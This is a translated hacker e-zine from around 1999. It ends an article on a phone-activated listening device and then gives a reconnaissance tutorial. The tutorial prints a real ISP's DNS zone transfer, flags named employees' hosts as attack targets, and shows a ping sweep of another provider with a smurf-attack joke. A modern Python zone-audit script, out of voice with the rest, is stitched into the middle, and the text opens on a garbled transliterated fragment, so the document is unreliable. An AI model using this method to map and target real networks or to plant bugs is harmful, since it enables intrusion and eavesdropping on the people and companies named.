 polovenie  na zatworena slushalka. Towa stawa 4rez prewklu4washtoto dejstwie
 na  Q3,  kato  se  swyrve  s  500  omow  kraj  na transformatora. Q2 swyrzwa
 zazemenata   4ast   na   A1   (usilwatel)  i  Q1  (izhoden  tranzistor)  kym
 otricatelnite polusi na B1 i B2.

 Sistemata se wklu4wa/izklu4wa ot prewklu4watelq (S1). Mikrofon ulawq zwucite
 i  gi prenasq kym pyrwite 2 tranzistora na A1. Seshtate se, 4e ka4estwoto na
 priemane  na  zwuka  zawisi  ot  kachestwoto  na  mikrofona!  R7  kontrolira
 4uwstwitelnostta  na  sistemata.  Diodyt D1 osigurqwa otricatelen signal kym
 pin2 na TM1 i taka startira kryga.

 First I want to confess: the ASCII isn't mine (I'm owning up without a
 beating :) (Note, NEIL - as if that weren't obvious at first glance). Well,
 still, I don't believe there's a normal person who would have it at hand and
 start drawing it all over again. But then, on the other hand, who said we're
 normal? Uff, I got a bit mixed up...... - aaaa, moving on:

 All the parts are labelled in the ASCII, which is very good! Only the rest
 (alligator clips, clamps) are not shown. Anyway, they are optional (the
 clamps, that is, not the alligator clips :). They help a lot when connecting
 the wires. R7 is used to adjust the sound so that you get acceptable
 quality. You judge whether it's acceptable! You can increase the time the
 timer stays active by changing the value of C13 (it cannot detect the phone
 being hung up, which is why it runs on a timer). A value of about 100
 microfarads will increase the time about 10 times. The switch S1 determines
 whether the system works or not. In short, you use it to switch the system
 on and off. This is roughly how the batteries will look when connected:

  <-v_____.   .______.    ._____.   .____->
           |   |      |    |     |   |
         __!___!__    |    |   __!___!__
         | +   - |    !_/ _!   | +   - |
         |       | switch  ^   |       |
         | 9 volt|         |   | 9 volt|
         !_______!  negative   !_______!


 After that you simply connect it through the jacks to the phone line.

 If you have a problem, there are a few basic things you should check first.
 Check that the polarity is respected (this applies if you settled on the
 variant with polarized capacitors). Then check that the soldering is done
 well and cleanly. All that's left is to make sure the battery is fitted
 correctly and the switch is in the right position. If it still doesn't work,
 there's only one solution (well, at least I think so): we start over ;-)))

 I keep thinking something more could be added here. For now it's only an
 idea, but expect a finished result soon. The point is that it's possible to
 hook another device up to this one, again activated by the phone. I'm
 talking about an alarm, lights, etc., but that's a future project. Just
 don't steal my idea; it takes a while before another one comes to me...
 Otherwise I'll gladly accept help with this. If there are such volunteers
 (Note, NEIL - hardly anyone that far gone will turn up to help him,
 but... :), you know where:

                        gfailure@phreedom.org

 and there will be big 10x if we finish it by winter. Because then, once the
 snow falls, nobody can see me until it's gone again (the snow, that is).
 (Note, NEIL - believe me, it's true!!)


     V. SOME LINKS

 I think this part of the file needs no comment:

     http://www.chat.ru/~radiospy/
     http://telehack.net/html/telephony/texts/ukphreak
     http://www.sonic.net/~theruler/txt/ess.html
     http://www.wraithtech.zzn.com


     VI. IN PLACE OF A CONCLUSION

     (damn, this dumb title, or whatever to call it, I'd seen in some
      literature textbook - I think so. But it sounds very funny,
      doesn't it??)

 So that's that. That's all from me for this CON. I had fairly high hopes of
 being able to tell you something more interesting, but there were exams, and
 some problems of another nature (family, cops, girlfriend, etc.), and for
 one or another of the above reasons I couldn't even gather my thoughts for
 something more coherent. But hopefully next time I'll give you some cooler
 stuff. I have a slightly nagging feeling that for this CON I also failed to
 do my job in another respect: I couldn't attract foreign participation. But
 considering how much feedback we got and what good publicity we made, I
 allow myself to dull that feeling with a little hope for the next CONs.

     And the last part ->

     Special 10x goes to:  NEIL (he knows what for)
                           dad (for the very valuable help from time to time)
                           my girl (for still putting up with me)
                           DEVIL PHREAK
                           ACID WARP
                           hevnst
                           DML
                           F|3|@|r  m|3 (I hope I spelled it right :)
                           DEXROS
                           XELA
              (....uff, I think I got a bit carried away :)
              (Note, NEIL - is that how that word is spelled?.. and yes - you got carried away :)
              (Note, Iron - even if it isn't spelled that way, that's what I'm the proofreader for ;-)

                        And to everyone at PHREEDOM ! ! !


            LOGGING OFF UNTIL NEXT TIME : General Failure
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

 >> EOA <<

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#06ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Collecting Information from Remote Sites                           ManiaX 
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

 The whole idea of this article is how to collect all possible information
 about a given site/provider/host etc. on the Inet. At first I was tempted to
 do all the research on a single place, but they might have sniffed me out,
 and that wouldn't have been very nice, because I was doing it from my own
 machine (I couldn't be bothered to do it from some shell; I hate waiting on
 ssh). Covered here are mainly methods that are completely normal and not
 punishable under any law, i.e. this is perfectly normal activity (well...
 not perfectly, but it isn't abnormal either, of the flying-nestea-packets
 kind).



     1) Service-based methods :

     1.1. DNS - maintained servers, upstream providers, backup lines

 Personally this is my favourite, because in many places one can get hold of
 the entire DNS database (which can be very, I repeat, VERY large - for
 example, with demon.co.uk I got tired of pulling it at the 2nd MB)... Below
 are one or two sample DNS databases with comments (the comments are enclosed
 in <[ ]> ).


      Sample DNS database :

; BIND version named 8.1.2-T3B Sun Jan  3 23:06:10 MST 1999
; BIND version bdale@rover:/home/bdale/debian/bind-8.1.2/target/bin/named
; zone 'spnet.net'   last serial 0
; from 212.50.0.10   at Fri Jul 16 14:34:27 1999
<[ up to here the output is from named-xfer - the program for downloading the DNS database. ]>

$ORIGIN net.
spnet           IN        SOA        ns.spnet.net. shtinkov.ns.spnet.net. (
                1999071400 28800 7200 604800 86400 )
                IN        NS        ns.spnet.net.
                IN        NS        purgatory.spnet.net.
                IN        MX        2 ns.spnet.net.
                IN        A        212.50.0.15

 <[ SOA record - who is responsible for the database (shtinkov@ns.spnet.net),
 which are the main name servers and which is the mail relay (i.e.
 information about the name spnet.net). ]>

$ORIGIN spnet.net.
dialup073       IN        A        212.50.13.73
dialup074       IN        A        212.50.13.74
dialup105       IN        A        212.50.13.105
modem10         IN        A        212.50.0.53
dialup086       IN        A        212.50.13.86
dialup106       IN        A        212.50.13.106
modem11         IN        A        212.50.0.54
dialup087       IN        A        212.50.13.87
dialup107       IN        A        212.50.13.107
modem12         IN        A        212.50.0.55
dialup088       IN        A        212.50.13.88
dialup110       IN        A        212.50.13.110

 <[ various dial-ups etc. (trimmed a bit by me) ]>

skat            IN        A        212.50.0.161
                IN        MX        10 skat.spnet.net.
$ORIGIN skat.spnet.net.
mail            IN        CNAME        skat.spnet.net.
www             IN        CNAME        skat.spnet.net.
proxy           IN        CNAME        skat.spnet.net.
ns              IN        CNAME        skat.spnet.net.
ftp             IN        CNAME        skat.spnet.net.

 <[ some client with its own server .... which nevertheless sits in their
 zone.. apparently they don't mind their name being xxx.spnet.net - so they
 are not an Inet provider ]>

$ORIGIN spnet.net.
modem13         IN        A        212.50.0.56
dialup089       IN        A        212.50.13.89
dialup091       IN        A        212.50.13.91

 <[ more dial-ups... the bad thing about named-xfer is that it doesn't sort
 at all. This problem is even more noticeable if you look at the DNS of bg -
 on danbo's machine it probably looks great, but once it goes through
 named-xfer it gets *** ***** ]>

cst             IN        A        212.50.0.193
svilengrad      IN        MX        10 cst.spnet.net.
$ORIGIN svilengrad.spnet.net.
cst             IN        CNAME        cst.spnet.net.
mail            IN        CNAME        cst.spnet.net.
proxy           IN        CNAME        cst.spnet.net.
www             IN        CNAME        cst.spnet.net.
ns              IN        CNAME        cst.spnet.net.
ftp             IN        CNAME        cst.spnet.net.

 <[ again something similar to skat - only these appear to be SPNET's
 representatives in Svilengrad.... ]>

$ORIGIN spnet.net.
spnet2digsys-local IN        A        212.50.10.238

 <[ IP of the router interface towards another provider - DIGSYS. As a rule,
 it is customary for the interface address on every router to have a name
 that corresponds to the link going through that interface (customary...
 it's not always so). ]>

dialup127       IN        A        212.50.13.127
dialup128       IN        A        212.50.13.128
dialup130       IN        A        212.50.13.130
intbg2spnet     IN        A        212.50.10.241

 <[ again a link to another provider ]>

spnet2intbg     IN        A        212.50.10.242

 <[ IP of the reverse interface... (i.e. on the router at the other end) ]>

irc             IN        CNAME        purgatory.spnet.net.

 <[ the company's irc server - just a CNAME to one of their big servers.
 Actually, in .bg there's almost no point in a separate machine for an irc
 server .. unless some sick mind decides to link to EFNET :)))) ]>

biolin          IN        A        212.50.0.9

 <[ a slightly different name - a BIOTEAM server ]>

mail            IN        CNAME        ns.spnet.net.

 <[ main mail relay. Most mail clients (for example Netscape Messenger) come
 configured to use an SMTP server named mail, and it's much easier to put an
 alias in the DNS than to change settings... ]>

spnet2netbg     IN        A        212.50.10.226
                IN        A        212.50.10.230

 <[ again addresses of a router interface ]>

pirdop1         IN        A        212.50.0.238

 <[ interesting ... further down there is also plain pirdop - apparently
 there's only 1 dial-up there? or a machine for the local admin? ]>

haskovo         IN        MX        10 gis.spnet.net.
$ORIGIN haskovo.spnet.net.
mail            IN        CNAME        gis.spnet.net.
www             IN        CNAME        gis.spnet.net.
proxy           IN        CNAME        gis.spnet.net.
ns              IN        CNAME        gis.spnet.net.
ftp             IN        CNAME        gis.spnet.net.
$ORIGIN spnet.net.
proxy           IN        CNAME        purgatory.spnet.net.

 <[ The company's main proxy server .. the reason for such an alias is the
 same as for the alias 'mail' ]>

digsys2spnet-local IN        A        212.50.10.237
router2         IN        A        212.50.0.2
digsys2spnet    IN        A        212.50.10.253
router3         IN        A        212.50.0.3
$ORIGIN sirma.spnet.net.
router          IN        A        212.50.14.129
$ORIGIN spnet.net.
router4         IN        A        212.50.0.4
dialup255       IN        A        212.50.13.255
router7         IN        A        212.50.0.7
router8         IN        A        212.50.0.8
ns              IN        A        212.50.0.10
<[ main name server and mail relay (see above) ]>
router          IN        A        212.50.0.1
<[ central router - who knows what CISCO ... ]>
parvak          IN        A        212.50.0.12

 <[ the admin's machine - you can tell by the name... as a rule nobody
 christens a main server with a name like that. ]>

debian          IN        A        212.50.0.16

 <[ Debian archive...... LONG LIVE! :))) ]>

 (Note, Iron - Da eibian ;-)

ibsf            IN        A        212.50.0.225
                IN        MX        10 ibsf.spnet.net.

 <[ here's another client with a leased line and mail relaying... ]>

pool            IN        CNAME        ns.spnet.net.
switch          IN        A        212.50.0.6
$ORIGIN plovdiv.spnet.net.
router          IN        A        212.50.21.1
$ORIGIN spnet.net.
gis             IN        A        212.50.0.241
rakia           IN        CNAME        parvak.spnet.net.

 <[ CNAME for the admin's machine .... ]>

harmanli        IN        A        212.50.14.97
                IN        MX        10 harmanli.spnet.net.
$ORIGIN harmanli.spnet.net.
cst             IN        CNAME        harmanli.spnet.net.
mail            IN        CNAME        harmanli.spnet.net.
proxy           IN        CNAME        harmanli.spnet.net.
www             IN        CNAME        harmanli.spnet.net.
ns              IN        CNAME        harmanli.spnet.net.
ftp             IN        CNAME        harmanli.spnet.net.
$ORIGIN spnet.net.
pirdop          IN        A        212.50.0.237
                IN        MX        10 pirdop.spnet.net.
$ORIGIN pirdop.spnet.net.
mail            IN        CNAME        pirdop.spnet.net.
www             IN        CNAME        pirdop.spnet.net.
proxy           IN        CNAME        pirdop.spnet.net.
ns              IN        CNAME        pirdop.spnet.net.
ftp             IN        CNAME        pirdop.spnet.net.

 <[ ha, who would have guessed there's SPNET in Pirdop? :))) ]>

$ORIGIN spnet.net.
manro           IN        A        212.50.0.17
ftp             IN        CNAME        purgatory.spnet.net.
coin            IN        A        212.50.0.14
spnet2bdata     IN        A        212.50.10.250
support         IN        A        212.50.0.19
radius          IN        CNAME        ns.spnet.net.
$ORIGIN center.spnet.net.
router3         IN        A        212.50.0.67
anemia          IN        A        212.50.0.69

 <[ another interesting machine ...... and in center.spnet.net at that, which
 is supposedly the zone of the main routers... ]>

router4               IN        A        212.50.0.68
switch                IN        A        212.50.0.70
router                IN        A        212.50.0.65
router2               IN        A        212.50.0.66
$ORIGIN spnet.net.
purgatory             IN        A        212.50.0.15
modem0                IN        A        212.50.0.43
modem1                IN        A        212.50.0.44
modem2                IN        A        212.50.0.45
modem3                IN        A        212.50.0.46
modem4                IN        A        212.50.0.47
modem5                IN        A        212.50.0.48
modem6                IN        A        212.50.0.49
modem7                IN        A        212.50.0.50
modem8                IN        A        212.50.0.51
modem9                IN        A        212.50.0.52
pernik                IN        A        212.50.19.65
                IN        MX        10 pernik.spnet.net.
$ORIGIN pernik.spnet.net.
pool6                IN        A        212.50.19.86
pool7                IN        A        212.50.19.87
pool0                IN        A        212.50.19.80
pool1                IN        A        212.50.19.81
mail                 IN        CNAME        pernik.spnet.net.
pool2                IN        A        212.50.19.82
www                  IN        CNAME        pernik.spnet.net.
proxy                IN        CNAME        pernik.spnet.net.
pool3                IN        A        212.50.19.83
pool4                IN        A        212.50.19.84
pool5                IN        A        212.50.19.85
ns                   IN        CNAME        pernik.spnet.net.
router               IN        A        212.50.19.66
ftp                  IN        CNAME        pernik.spnet.net.

 <[ here you can see a more serious presence in Pernik (???) with 8 dial-ups,
 with a router (which may well just be plain linux, with pernik and router on
 the same machine), even with www ....

 Whether router and pernik are the same machine can also be checked with
 traceroute....

 After one try it turns out that router.pernik either has traceroute
 filtered or simply isn't there, and that it sits after pernik.spnet in the
 topology.. which may mean that the IP was either put there out of habit, or
 their router has died, or it is simply some router that dial-ups hang off
 and nothing more... (here kay noted that it could be some dial-in router,
 some portmaster etc. that is being filtered.) ]>

$ORIGIN spnet.net.
dialup002              IN        A        212.50.13.2
ingbank                IN        MX        10 ibsf.spnet.net.
                       IN        CNAME        ibsf.spnet.net.

 <[ so that's what ibsf was - INGBANK... ]>

bta                IN        A        212.50.10.130

 <[ BTA .... Interesting ... a whole other article could be written on the
 subject of BTA :) ]>

spnet2netissat          IN        A        212.50.10.234
zlatica                 IN        A        212.50.0.233
                        IN        MX        10 zlatica.spnet.net.
$ORIGIN zlatica.spnet.net.
mail                    IN        CNAME        zlatica.spnet.net.
www                     IN        CNAME        zlatica.spnet.net.
proxy                   IN        CNAME        zlatica.spnet.net.
ns                      IN        CNAME        zlatica.spnet.net.
ftp                     IN        CNAME        zlatica.spnet.net.
$ORIGIN spnet.net.
netbg2spnet             IN        A        212.50.10.225
                        IN        A        212.50.10.229
spnet2digsys            IN        A        212.50.10.254
www                     IN        CNAME        purgatory.spnet.net.
topbg                   IN        CNAME        purgatory.spnet.net.



 This is more or less what the DNS database of a large (for BG) provider
 looks like. Various users, permanent IPs, 254 IPs set aside for dial-up..

 And here is one of their reverse zones (their main one) :




$ORIGIN 50.212.in-addr.arpa.
0                IN        SOA        ns.spnet.net. shtinkov.ns.spnet.net. (
                1999071400 28800 7200 604800 86400 )
                IN        NS        ns.spnet.net.
                IN        NS        purgatory.spnet.net.

 <[ ^^^ the same SOA record..... ]>

$ORIGIN 0.50.212.in-addr.arpa.
1                IN        PTR        router.spnet.net.
2                IN        PTR        router2.spnet.net.
3                IN        PTR        router3.spnet.net.
4                IN        PTR        router4.spnet.net.
6                IN        PTR        switch.spnet.net.
7                IN        PTR        router7.spnet.net.
8                IN        PTR        router8.spnet.net.
9                IN        PTR        biolin.spnet.net.
161               IN        PTR        skat.spnet.net.
10                IN        PTR        ns.spnet.net.
11                IN        PTR        bta.spnet.net.
12                IN        PTR        parvak.spnet.net.
14                IN        PTR        coin.spnet.net.
15                IN        PTR        purgatory.spnet.net.
16                IN        PTR        debian.spnet.net.
17                IN        PTR        manro.spnet.net.
19                IN        PTR        support.spnet.net.
193               IN        PTR        cst.spnet.net.
43                IN        PTR        modem0.spnet.net.
44                IN        PTR        modem1.spnet.net.
45                IN        PTR        modem2.spnet.net.
46                IN        PTR        modem3.spnet.net.
47                IN        PTR        modem4.spnet.net.
50                IN        PTR        modem7.spnet.net.
48                IN        PTR        modem5.spnet.net.
51                IN        PTR        modem8.spnet.net.
49                IN        PTR        modem6.spnet.net.
52                IN        PTR        modem9.spnet.net.
225               IN        PTR        ibsf.spnet.net.
53                IN        PTR        modem10.spnet.net.
54                IN        PTR        modem11.spnet.net.
55                IN        PTR        modem12.spnet.net.
56                IN        PTR        modem13.spnet.net.
57                IN        PTR        modem19.spnet.net.
60                IN        PTR        modem16.spnet.net.
58                IN        PTR        modem14.spnet.net.
233               IN        PTR        zlatica.spnet.net.
61                IN        PTR        modem17.spnet.net.
59                IN        PTR        modem15.spnet.net.
234               IN        PTR        stoyan.zlatica.spnet.net.
62                IN        PTR        modem18.spnet.net.
237               IN        PTR        pirdop.spnet.net.
65                IN        PTR        router.center.spnet.net.
238               IN        PTR        pirdop1.spnet.net.
66                IN        PTR        router2.center.spnet.net.
241               IN        PTR        gis.spnet.net.
67                IN        PTR        router3.center.spnet.net.
242               IN        PTR        admin.haskovo.spnet.net.
70                IN        PTR        switch.center.spnet.net.
68                IN        PTR        router4.center.spnet.net.
243               IN        PTR        pool1.haskovo.spnet.net.
69                IN        PTR        anemia.center.spnet.net.
244               IN        PTR        pool2.haskovo.spnet.net.
245               IN        PTR        pool3.haskovo.spnet.net.
246               IN        PTR        pool4.haskovo.spnet.net.
247               IN        PTR        pool5.haskovo.spnet.net.
248               IN        PTR        pool6.haskovo.spnet.net.

 <[ up to here, the standard information that we already got from the
 previous DNS database...... ]>

81                IN        PTR        biolin.bioteam.com.
82                IN        PTR        dimitrov.bioteam.com.
83                IN        PTR        corn.bioteam.com.
84                IN        PTR        kirilov.bioteam.com.
85                IN        PTR        tanja.bioteam.com.
86                IN        PTR        petrova.bioteam.com.
87                IN        PTR        zheliazkov.bioteam.com.
90                IN        PTR        topalov.bioteam.com.
88                IN        PTR        kckfb.bioteam.com.
89                IN        PTR        valov.bioteam.com.

 <[ this is how interesting machines for attack are discovered -
 username.xxx.com :)) these, it seems, are user machines with permanent real
 IPs... these are possibly the most vulnerable machines on the net... (maybe
 after the dial-ups... or maybe even ahead of them). ]>

 If we pull any of the other reverse DNS databases, we can discover other
 domains hosted by SPNET - for example yellowpages.bg etc. Just as the normal
 DNS gives us general information about the provider, the reverse DNS
 database can give information about the people/companies/other ISPs etc.
 hosted inside.
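
 Seen from the operator's side, the same reading of a zone can be automated as an audit of one's own dumps. The following is an added example, not code from the article: it parses dumps in the layout shown above ($ORIGIN switches, blank owner column, multi-line SOA), groups names by the role they give away, and cross-checks PTR records against the forward zone. The sample data, example.net, the role patterns and all function names are constructed assumptions.

```python
import re
from collections import defaultdict
# Constructed sample dumps (not from the article): example.net, RFC 5737 addresses.
FORWARD = """\
$ORIGIN net.
example     IN  SOA   ns.example.net. hostmaster.example.net. (
            1999071400 28800 7200 604800 86400 )
            IN  NS    ns.example.net.
$ORIGIN example.net.
router      IN  A     192.0.2.1
isp2peer    IN  A     192.0.2.226
            IN  A     192.0.2.230
dialup073   IN  A     192.0.2.73
adminbox    IN  A     192.0.2.12
rakia       IN  CNAME adminbox
branch      IN  A     192.0.2.200
"""
REVERSE = """\
$ORIGIN 2.0.192.in-addr.arpa.
1           IN  PTR   router.example.net.
11          IN  PTR   branch.example.net.
12          IN  PTR   adminbox.example.net.
81          IN  PTR   jsmith.customer.example.
"""

def absolute(name, origin):
    """Make a possibly relative zone-file name absolute under the current $ORIGIN."""
    name = name.lower()
    if name.endswith("."):
        return name
    return name + ("." if origin == "." else "." + origin)

def parse_zone(text):
    """Return [(owner, type, rdata)] with owner and target names made absolute."""
    logical, buf = [], ""
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()      # drop comments
        if not line.strip():
            continue
        buf = f"{buf} {line.strip()}" if buf else line
        if buf.count("(") > buf.count(")"):       # multi-line SOA still open
            continue
        logical.append(buf.replace("(", " ").replace(")", " "))
        buf = ""
    origin, owner, records = ".", None, []
    for line in logical:
        fields = line.split()
        if fields[0].startswith("$"):             # only $ORIGIN matters here
            if fields[0].upper() == "$ORIGIN":
                origin = fields[1].lower()
            continue
        if not line[0].isspace():                 # blank owner column = same owner
            owner = absolute(fields.pop(0), origin)
        while fields and (fields[0].isdigit() or fields[0].upper() == "IN"):
            fields.pop(0)                         # optional TTL and class
        if owner is None or len(fields) < 2:
            continue
        rtype, rdata = fields[0].upper(), fields[1:]
        if rtype in ("CNAME", "NS", "PTR", "MX"):
            rdata[-1] = absolute(rdata[-1], origin)
        records.append((owner, rtype, " ".join(rdata)))
    return records

# Assumed role patterns, modelled on the kinds of names the article comments on.
ROLE_PATTERNS = {
    "access pool": re.compile(r"^(dialup|modem|pool)\d+\."),
    "network gear": re.compile(r"^(router|switch|fw)\d*\."),
    "inter-provider link": re.compile(r"^[a-z]+2[a-z]+(-local)?\."),
    "admin host": re.compile(r"^admin"),
}

def classify(records):
    """Group address-bearing names by the role their first label gives away."""
    roles = defaultdict(set)
    for owner, rtype, _ in records:
        for role, pattern in ROLE_PATTERNS.items():
            if rtype == "A" and pattern.search(owner):
                roles[role].add(owner)
    return {role: sorted(names) for role, names in roles.items()}

def audit_reverse(forward, reverse, zone):
    """Return (PTRs into `zone` lacking a matching A record, PTR targets outside `zone`)."""
    addrs = defaultdict(set)
    for owner, rtype, rdata in forward:
        if rtype == "A":
            addrs[owner].add(rdata)
    mismatches, foreign = [], []
    for owner, target in ((o, t) for o, r, t in reverse if r == "PTR"):
        # 11.2.0.192.in-addr.arpa. -> 192.0.2.11
        ip = ".".join(reversed(owner[: -len(".in-addr.arpa.")].split(".")))
        if not target.endswith("." + zone):
            foreign.append((ip, target))          # a hosted customer's own domain
        elif ip not in addrs[target]:
            mismatches.append((ip, target, sorted(addrs[target])))
    return mismatches, foreign

if __name__ == "__main__":
    fwd, rev = parse_zone(FORWARD), parse_zone(REVERSE)
    print(classify(fwd), audit_reverse(fwd, rev, "example.net."), sep="\n")
```

 Everything this audit reports is what any client receives when the server answers zone transfers for everyone; in BIND, the allow-transfer option limits transfers to the listed secondaries.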



     1.2. nmap -sP (i.e. checking which IPs are in use), how full the
          IP range is, size of the provider

 <[ for this I used some old scans of infotel... ]>

Starting nmap V. 1.51 by Fyodor (fyodor@dhp.com, www.dhp.com/~fyodor/nmap/)
Host   (212.39.64.16) seems to be a subnet broadcast address (returned 8 extra pings)
Host ns.infotel.bg (212.39.64.18) appears to be up.
Host unnamed.infotel.bg (212.39.64.19) appears to be up.
Host unnamed.infotel.bg (212.39.64.20) appears to be up.
Host tch.infotel.bg (212.39.64.22) appears to be up.
Host c2501.infotel.bg (212.39.64.23) appears to be up.
Host acp70.infotel.bg (212.39.64.24) appears to be up.
Host c2522.infotel.bg (212.39.64.27) appears to be up.
Host c2511.infotel.bg (212.39.64.28) appears to be up.
Host nb.infotel.bg (212.39.64.29) appears to be up.
Host   (212.39.64.31) seems to be a subnet broadcast address (returned 8 extra pings)
Host   (212.39.64.32) seems to be a subnet broadcast address (returned 2 extra pings)

 <[ who feels like smurfing? :))) Looks like we have broadcasts here too... ]>

Host unnamed.infotel.bg (212.39.64.33) appears to be up.
Host unnamed.infotel.bg (212.39.64.34) appears to be up.
Host   (212.39.64.35) seems to be a subnet broadcast address (returned 2 extra pings)
Host   (212.39.64.48) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.49) appears to be up.
Host unnamed.infotel.bg (212.39.64.51) appears to be up.
Host unnamed.infotel.bg (212.39.64.55) appears to be up.
Host unnamed.infotel.bg (212.39.64.57) appears to be up.
Host unnamed.infotel.bg (212.39.64.59) appears to be up.
Host unnamed.infotel.bg (212.39.64.60) appears to be up.
Host   (212.39.64.63) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.97) appears to be up.
Host   (212.39.64.100) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.101) appears to be up.
Host unnamed.infotel.bg (212.39.64.102) appears to be up.
Host   (212.39.64.103) seems to be a subnet broadcast address (returned 1 extra pings)
Host   (212.39.64.112) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.113) appears to be up.
Host unnamed.infotel.bg (212.39.64.114) appears to be up.
Host vg.infotel.bg (212.39.64.116) appears to be up.
Host   (212.39.64.127) seems to be a subnet broadcast address (returned 1 extra pings)
Host pomps.infotel.bg (212.39.64.129) appears to be up.
Host unnamed.infotel.bg (212.39.64.132) appears to be up.
Host unnamed.infotel.bg (212.39.64.137) appears to be up.
Host unnamed.infotel.bg (212.39.64.139) appears to be up.
Host unnamed.infotel.bg (212.39.64.140) appears to be up.
Host unnamed.infotel.bg (212.39.64.144) appears to be up.
Host unnamed.infotel.bg (212.39.64.145) appears to be up.
Host unnamed.infotel.bg (212.39.64.146) appears to be up.
Host   (212.39.64.159) seems to be a subnet broadcast address (returned 1 extra pings)
Host   (212.39.64.160) seems to be a subnet broadcast address (returned 2 extra pings)
Host unnamed.infotel.bg (212.39.64.161) appears to be up.
Host unnamed.infotel.bg (212.39.64.163) appears to be up.
Host unnamed.infotel.bg (212.39.64.164) appears to be up.
Host unnamed.infotel.bg (212.39.64.165) appears to be up.
Host unnamed.infotel.bg (212.39.64.166) appears to be up.
Host unnamed.infotel.bg (212.39.64.170) appears to be up.
Host unnamed.infotel.bg (212.39.64.172) appears to be up.
Host unnamed.infotel.bg (212.39.64.174) appears to be up.
Host unnamed.infotel.bg (212.39.64.176) appears to be up.
Host unnamed.infotel.bg (212.39.64.177) appears to be up.
Host unnamed.infotel.bg (212.39.64.179) appears to be up.
Host   (212.39.64.191) seems to be a subnet broadcast address (returned 1 extra pings)
Host   (212.39.64.208) seems to be a subnet broadcast address (returned 4 extra pings)
Host unnamed.infotel.bg (212.39.64.209) appears to be up.
Host unnamed.infotel.bg (212.39.64.210) appears to be up.
Host unnamed.infotel.bg (212.39.64.211) appears to be up.
Host unnamed.infotel.bg (212.39.64.213) appears to be up.
Host unnamed.infotel.bg (212.39.64.218) appears to be up.
Host unnamed.infotel.bg (212.39.64.221) appears to be up.
Host unnamed.infotel.bg (212.39.64.222) appears to be up.
Host   (212.39.64.223) seems to be a subnet broadcast address (returned 4 extra pings)
Host   (212.39.64.224) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.225) appears to be up.
Host unnamed.infotel.bg (212.39.64.226) appears to be up.
Host unnamed.infotel.bg (212.39.64.227) appears to be up.
Host unnamed.infotel.bg (212.39.64.228) appears to be up.
Host unnamed.infotel.bg (212.39.64.230) appears to be up.
Host unnamed.infotel.bg (212.39.64.234) appears to be up.
Host   (212.39.64.239) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.64.253) appears to be up.
Host unnamed.infotel.bg (212.39.64.254) appears to be up.

Starting nmap V. 1.51 by Fyodor (fyodor@dhp.com, www.dhp.com/~fyodor/nmap/)
Host  (212.39.65.0) appears to be down.
Host   (212.39.65.0) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.65.1) appears to be up.
Host unnamed.infotel.bg (212.39.65.2) appears to be up.
Host unnamed.infotel.bg (212.39.65.3) appears to be up.
Host unnamed.infotel.bg (212.39.65.4) appears to be up.
Host unnamed.infotel.bg (212.39.65.5) appears to be up.
Host unnamed.infotel.bg (212.39.65.6) appears to be up.
Host  (212.39.65.7) appears to be down.
Host  (212.39.65.8) appears to be down.
Host  (212.39.65.9) appears to be down.
Host  (212.39.65.10) appears to be down.
Host  (212.39.65.11) appears to be down.
Host  (212.39.65.12) appears to be down.
Host  (212.39.65.13) appears to be down.
Host  (212.39.65.14) appears to be down.
Host  (212.39.65.15) appears to be down.
Host   (212.39.65.15) seems to be a subnet broadcast address (returned 1 extra pings)
Host  (212.39.65.16) appears to be down.
Host   (212.39.65.16) seems to be a subnet broadcast address (returned 1 extra pings)
Host unnamed.infotel.bg (212.39.65.17) appears to be up.
Host unnamed.infotel.bg (212.39.65.18) appears to be up.
Host unnamed.infotel.bg (212.39.65.19) appears to be up.
Host  (212.39.65.20) appears to be down.
Host  (212.39.65.21) appears to be down.
Host  (212.39.65.22) appears to be down.
Host  (212.39.65.23) appears to be down.
Host  (212.39.65.24) appears to be down.
Host  (212.39.65.25) appears to be down.
Host  (212.39.65.26) appears to be down.
Host  (212.39.65.27) appears to be down.
Host  (212.39.65.28) appears to be down.
Host  (212.39.65.29) appears to be down.
Host  (212.39.65.30) appears to be down.
Host  (212.39.65.31) appears to be down.
Host   (212.39.65.31) seems to be a subnet broadcast address (returned 1 extra pings)
Host  (212.39.65.32) appears to be down.

 <[ here I've cut out some hosts that are down .... from here on, wherever
 there are more than 5-6 down in a row they are trimmed ]>

Host  (212.39.65.87) appears to be down.
Host unnamed.infotel.bg (212.39.65.88) appears to be up.
Host  (212.39.65.89) appears to be down.
Host  (212.39.65.96) appears to be down.
Host unnamed.infotel.bg (212.39.65.97) appears to be up.
Host  (212.39.65.98) appears to be down.
Host unnamed.infotel.bg (212.39.65.99) appears to be up.
Host  (212.39.65.100) appears to be down.
Host  (212.39.65.132) appears to be down.
Host pppsof5.infotel.bg (212.39.65.133) appears to be up.
Host  (212.39.65.134) appears to be down.
Host  (212.39.65.135) appears to be down.
Host  (212.39.65.136) appears to be down.
Host  (212.39.65.137) appears to be down.
Host pppsof10.infotel.bg (212.39.65.138) appears to be up.
Host  (212.39.65.139) appears to be down.
Host  (212.39.65.149) appears to be down.
Host pppsof22.infotel.bg (212.39.65.150) appears to be up.

 <[ Some dial-ups....... ]>

Host  (212.39.65.151) appears to be down.
Host  (212.39.65.192) appears to be down.
Host   (212.39.65.192) seems to be a subnet broadcast address (returned 5 extra pings)
Host fpn.infotel.bg (212.39.65.193) appears to be up.
Host  (212.39.65.194) appears to be down.
Host db.infotel.bg (212.39.65.195) appears to be up.
